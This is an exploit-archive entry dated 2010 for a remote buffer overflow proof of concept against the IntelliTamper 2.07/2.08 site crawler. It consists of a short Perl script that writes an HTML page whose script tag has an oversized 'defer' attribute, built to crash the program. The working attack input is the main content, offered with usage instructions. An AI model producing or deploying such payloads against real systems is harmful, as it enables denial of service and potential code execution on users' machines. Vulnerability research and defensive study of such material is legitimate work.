[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : IntelliTamper 2.07/2.08 (defer)Remote Buffer Overflow Poc
# Published : 2010-01-21
# Author : SkuLL-HacKeR
# Previous Title : SimplePlayer v0.2 0day (.wav) overflow DOS Exploit
# Next Title : Microsoft Internet Explorer 6.0/7.0 NULL pointer crashes


# H0m3 : S3curity-art.com & Google.com
# M4!L : Wizard-skh@hotmail.com<mailto:Wizard-skh@hotmail.com> & My@hotmail.it<mailto:My@hotmail.it>
# usage : perl xpl.pl >>xpl.html
my $IntelliTamper_html ='<html><head><title>SkuLL-HackeR Home
World</title></head><body>' .
'<script defer="' .
"x41" x 3076 .
'">' .
"</body></html>";
print $IntelliTamper_html;